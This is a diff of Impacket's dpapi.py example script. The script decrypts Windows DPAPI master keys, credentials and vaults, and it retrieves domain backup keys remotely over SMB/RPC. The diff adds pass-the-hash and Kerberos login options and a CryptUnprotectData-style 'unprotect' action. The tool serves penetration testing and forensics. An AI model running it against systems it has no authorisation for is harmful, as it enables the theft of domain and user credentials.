@@ -1,16 +1,18 @@
-#!/usr/local/bin/python3.9
-#!/usr/local/bin/python3.9
-# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#!/usr/local/bin/python3.10
+#!/usr/local/bin/python3.10
+# Impacket - Collection of Python classes for working with network protocols.
 #
-# This software is provided under under a slightly modified version
+# SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under a slightly modified version
 # of the Apache Software License. See the accompanying LICENSE file
 # for more information.
 #
-# Author:
-#  Alberto Solino (@agsolino)
-#
 # Description:
-#       Example for using the DPAPI/Vault structures to unlock Windows Secrets.
+#   Example for using the DPAPI/Vault structures to unlock Windows Secrets.
+#
+# Author:
+#   Alberto Solino (@agsolino)
 #
 # Examples:
 #
@@ -21,14 +23,16 @@
 #   In the case of vaults, you might need to also provide the user's sid (and the user password will be asked).
 #   For system secrets, instead of a password you will need to specify the system and security hives.
 #
-# References: All of the work done by these guys. I just adapted their work to my needs.
-#       https://www.passcape.com/index.php?section=docsys&cmd=details&id=28
-#       https://github.com/jordanbtucker/dpapick
-#       https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials (and everything else Ben did )
-#       http://blog.digital-forensics.it/2016/01/windows-revaulting.html
-#       https://www.passcape.com/windows_password_recovery_vault_explorer
-#       https://www.passcape.com/windows_password_recovery_dpapi_master_key
+# References:
+#   All of the work done by these guys. I just adapted their work to my needs.
+#   - https://www.passcape.com/index.php?section=docsys&cmd=details&id=28
+#   - https://github.com/jordanbtucker/dpapick
+#   - https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials (and everything else Ben did )
+#   - http://blog.digital-forensics.it/2016/01/windows-revaulting.html
+#   - https://www.passcape.com/windows_password_recovery_vault_explorer
+#   - https://www.passcape.com/windows_password_recovery_dpapi_master_key
 #
+
 from __future__ import division
 from __future__ import print_function
 
@@ -36,7 +40,7 @@ import struct
 import argparse
 import logging
 import sys
-import re
+from six import b
 from binascii import unhexlify, hexlify
 from hashlib import pbkdf2_hmac
 
@@ -48,19 +52,21 @@ from impacket.smbconnection import SMBConnection
 from impacket.dcerpc.v5 import transport
 from impacket.dcerpc.v5 import lsad
 from impacket.dcerpc.v5 import bkrp
-from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY
+from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_GSS_NEGOTIATE
 from impacket import version
 from impacket.examples import logger
+from impacket.examples.utils import parse_target
 from impacket.examples.secretsdump import LocalOperations, LSASecrets
 from impacket.structure import hexdump
 from impacket.dpapi import MasterKeyFile, MasterKey, CredHist, DomainKey, CredentialFile, DPAPI_BLOB, \
     CREDENTIAL_BLOB, VAULT_VCRD, VAULT_VPOL, VAULT_KNOWN_SCHEMAS, VAULT_VPOL_KEYS, P_BACKUP_KEY, PREFERRED_BACKUP_KEY, \
     PVK_FILE_HDR, PRIVATE_KEY_BLOB, privatekeyblob_to_pkcs1, DPAPI_DOMAIN_RSA_MASTER_KEY
 
+
 class DPAPI:
     def __init__(self, options):
         self.options = options
-        self.dpapiSystem = None
+        self.dpapiSystem = {}
         pass
 
     def getDPAPI_SYSTEM(self,secretType, secret):
@@ -68,7 +74,6 @@ class DPAPI:
             machineKey, userKey = secret.split('\n')
             machineKey = machineKey.split(':')[1]
             userKey = userKey.split(':')[1]
-            self.dpapiSystem = {}
             self.dpapiSystem['MachineKey'] = unhexlify(machineKey[2:])
             self.dpapiSystem['UserKey'] = unhexlify(userKey[2:])
 
@@ -80,6 +85,13 @@ class DPAPI:
 
         lsaSecrets.dumpSecrets()
 
+        # Did we get the values we wanted?
+        if 'MachineKey' not in self.dpapiSystem or 'UserKey' not in self.dpapiSystem:
+            logging.error('Cannot grab MachineKey/UserKey from LSA, aborting...')
+            sys.exit(1)
+
+
+
     def deriveKeysFromUser(self, sid, password):
         # Will generate two keys, one with SHA1 and another with MD4
         key1 = HMAC.new(SHA1.new(password.encode('utf-16le')).digest(), (sid + '\0').encode('utf-16le'), SHA1).digest()
@@ -261,11 +273,7 @@ class DPAPI:
                     return
 
             elif self.options.target is not None:
-                domain, username, password, remoteName = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(self.options.target).groups('')
-                #In case the password contains '@'
-                if '@' in remoteName:
-                    password = password + '@' + remoteName.rpartition('@')[0]
-                    remoteName = remoteName.rpartition('@')[2]
+                domain, username, password, remoteName = parse_target(self.options.target)
 
                 if domain is None:
                     domain = ''
@@ -278,6 +286,7 @@ class DPAPI:
                     lmhash, nthash = self.options.hashes.split(':')
                 else:
                     lmhash, nthash = '',''
+
                 rpctransport = transport.DCERPCTransportFactory(r'ncacn_np:%s[\PIPE\protected_storage]' % remoteName)
 
                 if hasattr(rpctransport, 'set_credentials'):
@@ -288,6 +297,8 @@ class DPAPI:
                 
                 dce = rpctransport.get_dce_rpc()
                 dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
+                if self.options.k is True:
+                    dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
                 dce.connect()
                 dce.bind(bkrp.MSRPC_UUID_BKRP, transfer_syntax = ('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0'))
                 
@@ -327,9 +338,9 @@ class DPAPI:
 
         # credit to @gentilkiwi
         elif self.options.action.upper() == 'BACKUPKEYS':
-            domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
-                self.options.target).groups('')
-            if password == '' and username != '' and options.hashes is None:
+            domain, username, password, address = parse_target(self.options.target)
+
+            if password == '' and username != '' and self.options.hashes is None and self.options.no_pass is False and self.options.aesKey is None:
                 from getpass import getpass
                 password = getpass ("Password:")
             if self.options.hashes is not None:
@@ -338,13 +349,15 @@ class DPAPI:
                 lmhash, nthash = '',''
             connection = SMBConnection(address, address)
             if self.options.k:
-                connection.kerberosLogin(username, password, domain)
+                connection.kerberosLogin(username, password, domain, lmhash, nthash, self.options.aesKey)
             else:
                 connection.login(username, password, domain, lmhash=lmhash, nthash=nthash)
 
             rpctransport = transport.DCERPCTransportFactory(r'ncacn_np:445[\pipe\lsarpc]')
             rpctransport.set_smb_connection(connection)
             dce = rpctransport.get_dce_rpc()
+            if self.options.k:
+                dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
             try:
                 dce.connect()
                 dce.bind(lsad.MSRPC_UUID_LSAD)
@@ -466,6 +479,30 @@ class DPAPI:
                         keys = VAULT_VPOL_KEYS(data)
                         keys.dump()
                         return
+        elif self.options.action.upper() == 'UNPROTECT':
+            fp = open(options.file, 'rb')
+            data = fp.read()
+            blob = DPAPI_BLOB(data)
+
+            if self.options.key is not None:
+                key = unhexlify(self.options.key[2:])
+                if self.options.entropy_file is not None:
+                    fp2 = open(self.options.entropy_file, 'rb')
+                    entropy = fp2.read()
+                    fp2.close()
+                elif self.options.entropy is not None:
+                    entropy = b(self.options.entropy) + b'\x00'
+                else:
+                    entropy = None
+
+                decrypted = blob.decrypt(key, entropy)
+                if decrypted is not None:
+                    print('Successfully decrypted data')
+                    hexdump(decrypted)
+                    return
+            else:
+                # Just print the data
+                blob.dump()
 
         print('Cannot decrypt (specify -key or -sid whenever applicable) ')
 
@@ -475,15 +512,22 @@ if __name__ == '__main__':
     logger.init()
     print(version.BANNER)
 
-    parser = argparse.ArgumentParser(add_help=True, description="Nose")
+    parser = argparse.ArgumentParser(add_help=True, description="Example for using the DPAPI/Vault structures to unlock Windows Secrets.")
     parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
     subparsers = parser.add_subparsers(help='actions', dest='action')
 
     # A domain backup key command
     backupkeys = subparsers.add_parser('backupkeys', help='domain backup key related functions')
     backupkeys.add_argument('-t', '--target', action='store', required=True, help='[[domain/]username[:password]@]<targetName or address>')
-    backupkeys.add_argument('-k', action='store_true', required=False, help='use kerberos')
     backupkeys.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
+    backupkeys.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
+    backupkeys.add_argument('-k', action="store_true", required=False, help='Use Kerberos authentication. Grabs credentials from ccache file '
+                       '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '
+                       'ones specified in the command line')
+    backupkeys.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
+                                                                            '(128 or 256 bits)')
+    backupkeys.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. '
+                       'If omitted it will use the domain part (FQDN) specified in the target parameter')
     backupkeys.add_argument('--export', action='store_true', required=False, help='export keys to file')
 
     # A masterkey command
@@ -518,6 +562,13 @@ if __name__ == '__main__':
     vault.add_argument('-vpol', action='store', required=False, help='Vault Policy file')
     vault.add_argument('-key', action='store', required=False, help='Master key used for decryption')
 
+    # A CryptUnprotectData command
+    unprotect = subparsers.add_parser('unprotect', help='Provides CryptUnprotectData functionality')
+    unprotect.add_argument('-file', action='store', required=True, help='File with DATA_BLOB to decrypt')
+    unprotect.add_argument('-key', action='store', required=False, help='Key used for decryption')
+    unprotect.add_argument('-entropy', action='store', default=None, required=False, help='String with extra entropy needed for decryption')
+    unprotect.add_argument('-entropy-file', action='store', default=None, required=False, help='File with binary entropy contents (overwrites -entropy)')
+
     options = parser.parse_args()
 
     if len(sys.argv)==1:
@@ -539,4 +590,4 @@ if __name__ == '__main__':
         if logging.getLogger().level == logging.DEBUG:
             import traceback
             traceback.print_exc()
-        print(str(e))
+        print('ERROR: %s' % str(e))
